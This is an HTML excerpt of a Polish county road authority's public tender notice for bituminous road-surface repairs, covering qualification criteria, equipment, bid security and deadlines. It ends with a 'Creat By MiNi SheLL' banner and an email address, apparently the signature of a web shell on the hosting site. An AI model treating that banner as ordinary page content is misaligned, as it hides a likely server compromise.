dróg powiatowych będących w zarządzie Zarządu Dróg Powiatowych w Kartuzach wraz z zabezpieczeniem miejsca prowadzenia robót i właści-wym jego oznakowaniem. Prace ww. mają być wykonywane z zachowaniem zasad bezpie-czeństwa i zgodnie z obowiązującymi przepisami. <br/>4)	Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy. Każdy z wykonawców ponosi pełną odpo-wiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">80 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp do wysokości 100 % wartości zamówienia podstawowego (dotyczy obu części zamówienia) w zakresie wykonania podobnych robót budowlanych, co w postępowaniu. Zakres zamówienia podobnego obejmuje wykonanie odpowiednio dla części nr 1 wykonanie naprawy przełomów nawierzchni bitumicznych oraz dla części nr 2 wykonanie remontów nawierzchni bitumicznych na drogach powiatowych zgodnie z przedmiotem zamówienia.<br/><br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/><br/>1)	Wykonawca wykonał lub wykonuje należycie zamówienie podstawowe,<br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania zamówienia podstawowego.<br/>3)	W ramach prowadzonych negocjacji, Zamawiający i Wykonawca dojdą do porozumienia odnośnie ceny i terminu wykonania.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt. 3 powyżej, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.<br/>5)	Szacunkowe przedmiary robót dla zamówień podobnych:<br/>Remonty cząstkowe nawierzchni bitumicznych – część 2 <br/>Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną gr. 4 cm - rozbiórka nawierzchni poprzez frezowanie z wywozem w miejsce wskazane przez Zamawiającego - maksymalnie na odległość 30km.	m2	1000<br/>Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno-bitumiczną gr. ponad 4 cm - rozbiórka nawierzchni z frezowaniem	t	90<br/>Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	1000<br/>Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	1000</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę niepodlegającą odrzuceniu, która uzyska największą liczbę punktów obliczona w oparciu o podane kryteria oceny ofert przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający nie stawia warunku w powyższym zakresie. <br/>4)	zdolności technicznej lub zawodowej: <br/><br/>Wykonawcy:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>•	dla części I – WYKONANIE NAPRAWY PRZEŁOMÓW NAWIERZCHNI BITUMICZ-NYCH<br/><br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował (zakończył) co najmniej dwie roboty budowlane o wartości nie mniejszej niż 200 000 zł brutto każda lub jedną za minimum 400 000 zł brutto polegającą na wykonaniu naprawy przełomów nawierzchni bitumicznych na drogach, potwierdzoną, że ta robota została wykonana należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończona. <br/><br/><br/>•	dla części II – WYKONANIE REMONTÓW NAWIERZCHNI BITUMICZNYCH <br/><br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował (zakończył) co najmniej dwie roboty budowlane o wartości nie mniejszej niż 100 000 zł brutto każda lub jedną za minimum 200 000 zł brutto polegające na wykonaniu remontów nawierzchni bitumicznych na drogach, potwierdzonych, że te roboty zostały wykonane należycie zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <br/><br/>Za drogę zamawiający uzna drogę lub ulicę w rozumieniu art. 4 ustawy z dnia 21 marca 1985 r. o drogach publicznych (t.j. z 2020 r. Dz. U. poz. 470 z późn. zm.)<br/><br/>Jako wykonanie / zakończenie roboty budowlanej należy rozumieć podpisanie protokołu odbioru robót bez usterek/po usunięciu wad i usterek lub równoważnego dokumentu. <br/><br/>Dokument potwierdzający spełnienie warunku:<br/>Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz <br/>z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej <br/>i prawidłowo ukończone (załącznik nr 5 do SWZ).<br/><br/>b)	Osób (załącznik nr 6 do SWZ)<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>dysponuje co najmniej jedną osobą, skierowaną przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialną za kierowanie robotami budowlanymi legitymującą się uprawnieniami, doświadczeniem i kwalifikacjami zawodowymi określonymi poniżej:<br/><br/>Lp.	Funkcja	Minimalne doświadczenie i kwalifikacje zawodowe<br/> Kwalifikacje zawodowe	Doświadczenie<br/>1.	Kierownik budowy	Osoba ta, posiada uprawnienia do kierowania robotami budowlanymi w specjalności drogowej.	Osoba ta, pełniła funkcję kierownika budowy lub kierownika robót branży drogowej nad co najmniej 2. robotami budowlanymi o wartości nie mniejszej niż 200.000 zł brutto każda lub jedną za minimum 400.000 zł brutto, polegającymi na budowie/przebudowie/rozbudowie/remoncie (odnowie) dróg w technologii wykonania nawierzchni bitumicznych.<br/><br/><br/>Warunek wspólny dla obu części zamówienia. W przypadku złożenia oferty na obie części zamówienia, wystarczy jednokrotne spełnienie powyższego warunku.<br/><br/>Wskazane osoby muszą posiadać uprawnienia budowlane zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.). Dopuszcza się ważne <br/>i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów. <br/><br/>Ponadto wskazane osoby muszą być zrzeszone we właściwych branżowo izbach samorządów zawodowych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 r. poz. 551).<br/><br/>Niezależnie od powyższych wymagań, celem zapewnienia należytego wykonania roboty budowlanej Wykonawca zapewni w ramach zamówienia wykonanie robót branżowych przez osoby posiadające odpowiednie kwalifikacje i uprawnienia budowlane na podstawie obowiązujących przepisów. Nie wymaga się przedłożenia w ofercie informacji o osobach na stanowiska inne aniżeli pełniącej funkcję: kierownika budowy. <br/><br/>c) Sprzętu - Zamawiający uzna warunek za spełniony, jeżeli:<br/>Wykonawca wykaże, że dysponuje lub będzie dysponował minimum :<br/><br/>•	dla części I – WYKONANIE NAPRAWY PRZEŁOMÓW NAWIERZCHNI BITUMICZ-NYCH<br/><br/>- 1 rozkładarką mas bitumicznych, <br/>- 1 walcem ogumionym,<br/>- 1 walcem stalowym,<br/>- 1 frezarką do nawierzchni bitumicznych, <br/>- 2 koparkami, <br/>- 1 samochodem samowyładowczym.<br/><br/>•	dla części II – WYKONANIE REMONTÓW NAWIERZCHNI BITUMICZNYCH<br/><br/>- 1 rozkładarką mas bitumicznych, <br/>- 1 walcem ogumionym,<br/>- 1 walcem stalowym,<br/>- 1 frezarką do nawierzchni bitumicznych, <br/>- 1 samochodem samowyładowczym.<br/><br/>Warunek wspólny dla obu części zamówienia. W przypadku złożenia oferty na obie części zamówienia, wystarczy jednokrotne spełnienie powyższego warunku.<br/><br/>Dokument potwierdzający spełnienie warunku: <br/><br/>Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami (załącznik nr 7 do SWZ). <br/><br/>7.3. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>7.4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych <br/>lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (załącznik nr 5 do SWZ);<br/>b) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami ( załącznik nr 6 do SWZ).<br/>c) Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wyko-nawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dys-ponowania tymi zasobami (załącznik nr 7 do SWZ)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) na wezwanie Zamawiającego - oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty poprzez wniesienie wadium w wysokości:<br/>1) 3 000,00 zł. (słownie: trzy tysiące złotych 00/100) - w zakresie I części zamówienia – wy-konanie naprawy przełomów nawierzchni bitumicznych <br/>2) 1 000,00 zł. (słownie: jeden tysiąc złotych 00/100) - w zakresie II części zamówienia – wy-konanie remontów nawierzchni bitumicznych.<br/><br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwalnie do dnia upływu terminu związania ofertą.<br/>18.2. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>18.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>18.4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego nr 59 1020 1866 0000 1102 0002 6989, z podaniem tytułu „Wykonanie naprawy przełomów nawierzchni bitumicznych część nr 1” lub „wykonanie remontów nawierzchni bitumicznych część 2.”<br/>18.5.	UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 97 ust. 8 ustawy Prawo zamówień publicznych, tzn. „przelewem na rachunek bankowy wskazany przez zamawiającego”. <br/>W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 29 sierpnia 1997(t.j. Dz.U. z 2019 r., poz. 2357) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.<br/>18.6.	Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.;<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Powiat Kartuski – Zarząd Dróg Powiatowych w Kartuzach<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>18.7.	Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>18.8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej w ofercie.<br/>23.2.	Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>3)	gwarancjach bankowych;<br/>4)	gwarancjach ubezpieczeniowych;<br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 usta-wy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczo-ści. (Dz. U. z 2020.299).<br/>23.3.	Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez zamawiającego. W przypadku wnoszenia zabezpieczenia na-leżytego wykonania umowy w pieniądzu, odpowiednią kwotę należy wpłacić przele-wem na rachunek bankowy zamawiającego: nr 59 1020 1866 0000 1102 0002 6989, z podaniem tytułu „Zabezpieczenie należytego wykonania umowy – „Wykonanie naprawy dróg powiatowych w obszarze działania Zarządu Dróg Powiatowych w Kartuzach część nr …… ” najpóźniej w dniu zawarcia umowy.<br/>23.4.	W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zali-czenie kwoty wadium na poczet zabezpieczenia.<br/>23.5.	Jeżeli zabezpieczenie wniesiono w pieniądzu, zamawiający przechowuje je na oprocen-towanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pie-niądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji ban-kowej za przelew pieniędzy na rachunek bankowy wykonawcy.<br/>23.6.	Zamawiający pozostawia na zabezpieczenie roszczeń z tytułu rękojmi za wady lub gwa-rancji kwotę 30% zabezpieczenia.<br/>23.7.	Kwota zabezpieczenia jest zwracana nie później niż w 15. dniu po upływie okresu rę-kojmi za wady lub gwarancji.<br/>23.8.	Zabezpieczenie należytego wykonania umowy powinno obejmować okres: <br/>a)	z zakresie 100% wysokości zabezpieczenia - od dnia zawarcia umowy do dnia wykona-nia przedmiotu umowy wraz z dniem dokonania odbioru końcowego i uznania przez Zamawiającego zamówienia za należycie wykonane, wydłużony o okres 30 dni na do-konanie zwrotu 70% wartości kwoty zabezpieczenia. Przez dzień dokonania odbioru końcowego należy rozumieć dzień wykonania przedmiotu umowy i zgłoszenia przez Wykonawcę gotowości do odbioru końcowego plus 7. dniowy termin na wyznaczenie i rozpoczęcie czynności obioru końcowego przez Zamawiającego plus 14. dniowy termin na dokonanie odbioru końcowego. <br/>b)	w zakresie 30% wysokości zabezpieczenia - od dnia następnego po dokonaniu odbioru końcowego plus okres gwarancji i rękojmi wynikający z zawartej umowy plus 15 dni na dokonanie zwrotu 30% kwoty zabezpieczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne zmiany umowy oraz określenie warunków zmian, zostało zawarte w SWZ - ROZDZIAŁ V : wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-05 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">oferty powinny być złożone za pośrednictwem Platformy zakupowej https://platformazakupowa.pl/pn/zdp_kartuzy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-05 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UWAGA: Wraz z ofertą należy złożyć:<br/>1. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu udostępniającego zasoby - jeśli dotyczy;<br/>2. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy - jeśli dotyczy;<br/>3. Zobowiązania wymagane postanowieniami pkt. 10.3. SWZ, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu wraz z pełnomocnictwami - jeśli dotyczy;<br/>4. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy Pzp -jeśli dotyczy;<br/>5. Oświadczenie wymagane postanowieniami pkt. 9.2., 10.9. i 12.3. SWZ.<br/>6. Oświadczenie o niepodleganiu wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – załącznik nr 2a do SWZ.<br/>W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/>a) na wezwanie Zamawiającego - oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp i w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com